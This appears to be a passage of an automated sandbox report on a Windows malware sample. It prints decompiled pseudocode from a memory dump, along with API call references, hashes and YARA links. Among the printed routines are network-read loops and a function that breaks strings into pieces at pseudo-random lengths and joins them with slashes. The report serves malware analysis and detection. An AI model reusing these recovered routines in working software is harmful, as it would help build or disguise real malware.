0x001c10be
0x001c10c0
0x001c10c2
0x001c10c4
0x001c10ce
0x001c10d3
0x001c10d5
0x001c10d7
0x001c10d8
0x001c10d9
0x001c10da
0x001c10e1
0x001c10e8
0x001c10eb
0x001c10eb
0x001c10b8
0x001c10b8
0x001c10b8
0x001c10f3
0x001c10fb
0x001c1104
0x001c1109
0x001c1109
0x001c110e
0x00000000
0x00000000
0x001c1110
0x001c1113
0x001c111d
0x00000000
0x00000000
0x001c111f
0x001c111f
0x001c1129
0x001c1109
0x001c110e
0x00000000
0x00000000
0x00000000
0x001c110e
0x001c1133
0x001c1136
0x001c1139
0x001c1140
0x001c1140
0x001c114d
0x00000000
0x001c114d
0x001c1048
0x001c104c
0x001c104d
0x001c104f
0x00000000
0x00000000
0x00000000
0x001c104f
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 001C10C4
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 001C10DA
memset.NTDLL ref: 001C117A
memset.NTDLL ref: 001C118A

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 6f671fc46088c7283f75cb6aa6f6557ea9d5cf2c44cb7c289ec189e9cbc3cc49
Instruction ID: 1ef02752d8ee1f19678eea0f5a519024fb1941d58d515b431048aea19c8e62eb
Opcode Fuzzy Hash: 6f671fc46088c7283f75cb6aa6f6557ea9d5cf2c44cb7c289ec189e9cbc3cc49
Instruction Fuzzy Hash: 8F41AF71A00259BFDB109EA8DC85FEE7774EF65310F10852DF91AAB182DB70DD588B81

Uniqueness

Uniqueness Score: -1.00%

Function 001CA9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,766F11C0), ref: 001CA9BD

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

ResetEvent.KERNEL32(?), ref: 001CAA31
GetLastError.KERNEL32 ref: 001CAA54
GetLastError.KERNEL32 ref: 001CAAFF

Part of subcall function 001C9039: HeapFree.KERNEL32(00000000,00000000,001C7F18), ref: 001C9045

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 67c518307a1cf6ea19c27f68b58f6354e7033135359c7d4e4721076fc80e0fed
Instruction ID: fd031e9b6e213dd91a2b88cd20e01a3d644d8415965e39ff93c281cd9a8aa860
Opcode Fuzzy Hash: 67c518307a1cf6ea19c27f68b58f6354e7033135359c7d4e4721076fc80e0fed
Instruction Fuzzy Hash: A3418D71500208BBD7229FA5DC49E6F7EBDEFA9708B14492DF142D24A0E771D984CB21

Uniqueness

Uniqueness Score: -1.00%

Function 001C39BF, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E001C39BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t35;
				intOrPtr* _t36;
				intOrPtr* _t38;
				void* _t52;
				long _t57;
				void* _t58;

				_t52 = __ecx;
				_t58 = __eax;
				_t57 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t58 + 0x18)));
				if( *0x1cd134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t58 + 0x30)) = 0;
						L21:
						return _t57;
					}
					_push( &_v12);
					_push(1);
					_push(0);
					E001CD168();
					if(0 != 0) {
						_t57 = 8;
						goto L21;
					}
					_t35 = E001C2049(0x1000);
					_v16 = _t35;
					if(_t35 == 0) {
						_t57 = 8;
						L18:
						_t36 = _v12;
						 *((intOrPtr*)( *_t36 + 8))(_t36);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t38 = _v12;
						_t55 =  *_t38;
						 *((intOrPtr*)( *_t38 + 0x10))(_t38);
						ResetEvent( *(_t58 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t58 + 0x18)));
						if( *0x1cd134() != 0) {
							goto L13;
						}
						_t57 = GetLastError();
						if(_t57 != 0x3e5) {
							L15:
							E001C9039(_v16);
							if(_t57 == 0) {
								_t57 = E001C7A07(_v12, _t58);
							}
							goto L18;
						}
						_t57 = E001C1C47( *(_t58 + 0x1c), _t55, 0xffffffff);
						if(_t57 != 0) {
							goto L15;
						}
						_t57 =  *((intOrPtr*)(_t58 + 0x28));
						if(_t57 != 0) {
							goto L15;
						}
						L13:
						_t57 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t57 = GetLastError();
				if(_t57 != 0x3e5) {
					L4:
					if(_t57 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t57 = E001C1C47( *(_t58 + 0x1c), _t52, 0xffffffff);
				if(_t57 != 0) {
					goto L21;
				}
				_t57 =  *((intOrPtr*)(_t58 + 0x28));
				goto L4;
			}

0x001c39bf
0x001c39ce
0x001c39d3
0x001c39d5
0x001c39da
0x001c39db
0x001c39e0
0x001c39e1
0x001c39ec
0x001c3a1d
0x001c3a22
0x001c3ae5
0x001c3ae8
0x001c3aee
0x001c3aee
0x001c3a2b
0x001c3a2c
0x001c3a2e
0x001c3a2f
0x001c3a37
0x001c3ae2
0x00000000
0x001c3ae2
0x001c3a42
0x001c3a49
0x001c3a4c
0x001c3ad4
0x001c3ad5
0x001c3ad5
0x001c3adb
0x00000000
0x001c3adb
0x001c3a52
0x001c3a54
0x001c3a5a
0x001c3a5b
0x001c3a5b
0x001c3a5e
0x001c3a61
0x001c3a67
0x001c3a6c
0x001c3a6d
0x001c3a72
0x001c3a75
0x001c3a80
0x00000000
0x00000000
0x001c3a88
0x001c3a90
0x001c3ab9
0x001c3abc
0x001c3ac3
0x001c3ace
0x001c3ace
0x00000000
0x001c3ac3
0x001c3a9c
0x001c3aa0
0x00000000
0x00000000
0x001c3aa2
0x001c3aa7
0x00000000
0x00000000
0x001c3aa9
0x001c3aa9
0x001c3aae
0x00000000
0x00000000
0x001c3ab0
0x001c3ab1
0x001c3ab4
0x001c3ab4
0x001c3a5b
0x001c39f4
0x001c39fc
0x001c3a15
0x001c3a17
0x00000000
0x00000000
0x00000000
0x001c3a17
0x001c3a08
0x001c3a0c
0x00000000
0x00000000
0x001c3a12
0x00000000

APIs

ResetEvent.KERNEL32(?), ref: 001C39D5
GetLastError.KERNEL32 ref: 001C39EE

Part of subcall function 001C1C47: WaitForMultipleObjects.KERNEL32(00000002,001CAA72,00000000,001CAA72), ref: 001C1C62

ResetEvent.KERNEL32(?), ref: 001C3A67
GetLastError.KERNEL32 ref: 001C3A82

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID:
API String ID: 2394032930-0
Opcode ID: 12c6a9eef521a1e34c1e748336cb5bc2e32a0cfb8abc62f33e91a6a7f9697cdf
Instruction ID: 3176a8b3b150212a6e080fdd3113f9fe3a58d47cb4a2355abc189438f30b552a
Opcode Fuzzy Hash: 12c6a9eef521a1e34c1e748336cb5bc2e32a0cfb8abc62f33e91a6a7f9697cdf
Instruction Fuzzy Hash: 5931C432600604EBCB21DBA5CC44F6E77B9AFA4760F24852CF5A5E7590EB30EE61CB10

Uniqueness

Uniqueness Score: -1.00%

Function 001C3AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 001C3B46
SysAllocString.OLEAUT32(001C1885), ref: 001C3B89
SysFreeString.OLEAUT32(00000000), ref: 001C3B9D
SysFreeString.OLEAUT32(00000000), ref: 001C3BAB

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 4aabd5a3e23e8e04c01726b52738ceb8392691b45c64df47717466efa3905976
Instruction ID: 90d0ac46e7b74d7fa8db75ef1f21ab7775a27b9601eff8f3ca2d66d2aedfacbe
Opcode Fuzzy Hash: 4aabd5a3e23e8e04c01726b52738ceb8392691b45c64df47717466efa3905976
Instruction Fuzzy Hash: 6431F7B1900109EFCB15CF98D8C4DAE7BB5FF58340B21842EE51AA7210D735DA85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C42EA, Relevance: 6.1, APIs: 4, Instructions: 95
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E001C42EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x1cd270; // 0x82c6b188
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x1cd27c; // 0x317a7d0
				_t3 = _t8 + 0x1ce862; // 0x61636f4c
				_t25 = 0;
				_t30 = E001C7A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x1cd2a8, 1, 0, _t30);
					E001C9039(_t30);
				}
				_t12 =  *0x1cd25c; // 0x10000106
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E001C757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E001C205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x1cd0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E001CA501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x001c42eb
0x001c42f2
0x001c42fc
0x001c4300
0x001c4306
0x001c4315
0x001c431c
0x001c4320
0x001c4332
0x001c4334
0x001c4334
0x001c4339
0x001c4340
0x001c4395
0x001c4395
0x001c439b
0x001c439d
0x001c439d
0x001c43a7
0x001c43ab
0x001c43bd
0x001c43bd
0x001c43c1
0x001c43c7
0x001c43c7
0x00000000
0x001c4359
0x001c435e
0x001c4366
0x001c4368
0x001c436c
0x001c436c
0x001c4379
0x001c437d
0x001c4381
0x001c43d6
0x001c43dc
0x001c43dc
0x001c438f
0x001c4393
0x001c43ca
0x001c43cc
0x001c43cf
0x001c43cf
0x00000000
0x001c43cc
0x001c4393
0x00000000
0x001c437d

APIs

Part of subcall function 001C7A9A: lstrlen.KERNEL32(001C23E9,00000000,00000000,00000027,00000005,00000000,00000000,001C96DA,74666F53,00000000,001C23E9,001CD00C,?,001C23E9), ref: 001C7AD0
Part of subcall function 001C7A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 001C7AF4
Part of subcall function 001C7A9A: lstrcat.KERNEL32(00000000,00000000), ref: 001C7AFC

CreateEventA.KERNEL32(001CD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,001C3CA0,?,00000001,?), ref: 001C432B

Part of subcall function 001C9039: HeapFree.KERNEL32(00000000,00000000,001C7F18), ref: 001C9045

WaitForSingleObject.KERNEL32(00000000,00004E20), ref: 001C4389
WaitForSingleObject.KERNEL32(00000000,00004E20), ref: 001C43B7
CloseHandle.KERNEL32(00000000), ref: 001C43CF

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 4b0702aea828699f4333a28fb93d92b29a1e5bc1db987c4205bbf873439ea485
Instruction ID: 7c0cf3de07fa30c244c0935c51edc678655f0fec526a78dd11a773fe2312cca0
Opcode Fuzzy Hash: 4b0702aea828699f4333a28fb93d92b29a1e5bc1db987c4205bbf873439ea485
Instruction Fuzzy Hash: ED21E4325042A19BC7315BA89C54F6B77A9FBF8B60B15122DF955DB140D771CC418690

Uniqueness

Uniqueness Score: -1.00%

Function 001CA0B2, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E001CA0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x1cd144; // 0x1cad81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E001C2049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E001C9039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E001C1C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x001ca0b2
0x001ca0b2
0x001ca0bc
0x001ca0c2
0x001ca0c5
0x001ca0c9
0x001ca0d1
0x001ca0d4
0x001ca0ed
0x001ca0f0
0x001ca0f4
0x001ca0f8
0x001ca0f9
0x001ca0fe
0x001ca101
0x001ca108
0x001ca10f
0x001ca162
0x001ca16b
0x001ca16e
0x001ca1a9
0x001ca1af
0x00000000
0x00000000
0x00000000
0x001ca16e
0x001ca115
0x00000000
0x001ca11c
0x001ca12a
0x001ca12d
0x001ca130
0x001ca13c
0x001ca140
0x001ca1a2
0x001ca142
0x001ca145
0x001ca149
0x001ca14a
0x001ca14b
0x001ca14d
0x001ca154
0x001ca192
0x001ca19d
0x001ca156
0x001ca159
0x001ca15d
0x001ca15d
0x001ca154
0x00000000
0x001ca140
0x001ca115
0x001ca0d9
0x001ca0df
0x001ca0e4
0x001ca0e7
0x00000000
0x00000000
0x00000000
0x001ca177
0x001ca17f
0x001ca186
0x001ca186
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 001CA0C9
SetEvent.KERNEL32(?), ref: 001CA0D9
GetLastError.KERNEL32 ref: 001CA162

Part of subcall function 001C1C47: WaitForMultipleObjects.KERNEL32(00000002,001CAA72,00000000,001CAA72), ref: 001C1C62

Part of subcall function 001C9039: HeapFree.KERNEL32(00000000,00000000,001C7F18), ref: 001C9045

GetLastError.KERNEL32(00000000), ref: 001CA197

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 490a61fe50a58d4d25f4fc949f6874862d9c9a0336c8292adfef8065b007d402
Instruction ID: c244fe1de451f1f8c74dd2b3b6e4a074b8d3da65e8424f55211c86f2853005bb
Opcode Fuzzy Hash: 490a61fe50a58d4d25f4fc949f6874862d9c9a0336c8292adfef8065b007d402
Instruction Fuzzy Hash: 1F31F7B590020CEFEB219FE5CC80EAEBBF8AF14344F54496EE142E2551D730EE849B61

Uniqueness

Uniqueness Score: -1.00%

Function 001C3BF1, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E001C3BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E001C9763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E001CA022(_t23);
						}
					}
					return _t38;
				}
				if(E001CA72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x1cd2a8, 1, 0,  *0x1cd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E001C8A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E001C17D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E001C1F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E001C42EA( &_v32, _t39);
					goto L13;
				}
			}

0x001c3bf1
0x001c3bfe
0x001c3c04
0x001c3c05
0x001c3c06
0x001c3c07
0x001c3c08
0x001c3c0c
0x001c3c18
0x001c3c1c
0x001c3ca4
0x001c3ca4
0x001c3ca7
0x001c3ca9
0x001c3cb1
0x001c3cb1
0x001c3cb7
0x001c3cba
0x001c3cba
0x001c3cb7
0x001c3cc5
0x001c3cc5
0x001c3c2f
0x001c3c31
0x001c3c31
0x001c3c48
0x001c3c4c
0x001c3c4f
0x001c3c5a
0x001c3c61
0x001c3c61
0x001c3c6d
0x001c3c6e
0x001c3c7c
0x001c3c70
0x001c3c70
0x001c3c71
0x001c3c72
0x001c3c73
0x001c3c74
0x001c3c75
0x001c3c75
0x001c3c81
0x001c3c86
0x001c3c88
0x001c3c8a
0x001c3c8a
0x001c3c91
0x00000000
0x001c3c93
0x001c3c93
0x001c3ca0
0x00000000
0x001c3ca0

APIs

CreateEventA.KERNEL32(001CD2A8,00000001,00000000,00000040,00000001,?,7671BB27,00000000,766F41C0,?,?,?,001C6880,?,00000001,?), ref: 001C3C42
SetEvent.KERNEL32(00000000,?,?,?,001C6880,?,00000001,?,00000002,?,?,001C2417,?), ref: 001C3C4F
Sleep.KERNEL32(00000BB8,?,?,?,001C6880,?,00000001,?,00000002,?,?,001C2417,?), ref: 001C3C5A
CloseHandle.KERNEL32(00000000), ref: 001C3C61

Part of subcall function 001C8A51: WaitForSingleObject.KERNEL32(00000000,?), ref: 001C8B2B

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: ce5d3a7d3710ad4b38ec6e5fde8d8a05cdae1b57bd3056b440bc83216e26e430
Instruction ID: c4d0139ee8419c076b1b269d8840ae9bada2c7e8b3d385b33b3dec6335277db2
Opcode Fuzzy Hash: ce5d3a7d3710ad4b38ec6e5fde8d8a05cdae1b57bd3056b440bc83216e26e430
Instruction Fuzzy Hash: 41219272D00219ABCB10BFE49885EEEB779AF64350B05842EFA21F7500D734DE458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 001C788B, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001C788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x1cd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x1cd250; // 0xadc746a0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x1cd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x001c7893
0x001c7896
0x001c789c
0x001c78b4
0x001c78b8
0x001c78bb
0x001c78bd
0x001c78c0
0x001c78c2
0x001c78c5
0x001c78c7
0x001c78c7
0x001c78c9
0x001c78d4
0x001c78d9
0x001c78ea
0x001c78f2
0x001c78f7
0x001c78fa
0x001c78fd
0x001c78ff
0x001c7905
0x001c7908
0x001c7908
0x001c7908
0x001c7913
0x001c7918
0x001c7922

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001C839A,00000000,?,?,001CA428,?,033497D8), ref: 001C7896
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C78AE
memcpy.NTDLL(00000000,?,-00000008,?,?,?,001C839A,00000000,?,?,001CA428,?,033497D8), ref: 001C78F2
memcpy.NTDLL(00000001,?,00000001), ref: 001C7913

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 6b0d9085639e81845ad8c1e5da99a855a98b5b76f2bf9427535cece80cfbb763
Instruction ID: e6f0235898e85800a68a4e260eae368d08c6e3816c7552872c6e4f7d9c7dfb04
Opcode Fuzzy Hash: 6b0d9085639e81845ad8c1e5da99a855a98b5b76f2bf9427535cece80cfbb763
Instruction Fuzzy Hash: 31110C72A00114AFC7108B69EC88E9EBFEEEBD5360B05017AF505D7190EB70DE54C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001C94A9, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E001C94A9(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E001C2049(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x1cc2a4);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x1cc2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x001c94b4
0x001c94b8
0x001c94ba
0x001c94bb
0x001c94c3
0x001c94c3
0x001c94c7
0x00000000
0x00000000
0x001c94be
0x001c94bf
0x001c94c2
0x001c94c2
0x001c94cf
0x001c94d6
0x001c94da
0x001c94e2
0x001c94e8
0x001c94ea
0x001c94ef
0x001c94f3
0x001c94f5
0x001c94f8
0x001c94ff
0x001c94ff
0x001c9509
0x001c950c
0x001c950f
0x001c950f
0x001c951b
0x001c951b
0x001c9528

APIs

StrChrA.SHLWAPI(?,00000020), ref: 001C94C3
StrTrimA.SHLWAPI(?,001CC2A4), ref: 001C94E2
StrChrA.SHLWAPI(?,00000020), ref: 001C94ED
StrTrimA.SHLWAPI(00000001,001CC2A4), ref: 001C94FF

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 7a0c5d98db6a71de75a8e677afad44eae96c634e47737e74db0f7fadcc1d398a
Instruction ID: 07ddf7785b98a320603ac8bd427b02a5f3ffc6a7b6547d97f9f478a6dd27d5bb
Opcode Fuzzy Hash: 7a0c5d98db6a71de75a8e677afad44eae96c634e47737e74db0f7fadcc1d398a
Instruction Fuzzy Hash: 9A01B1716053216FD2319F6ADC4DF2BBE98EBA6BA0F12051DF845C7640DB60CC0286A0

Uniqueness

Uniqueness Score: -1.00%

Function 001C7A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E001C7A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
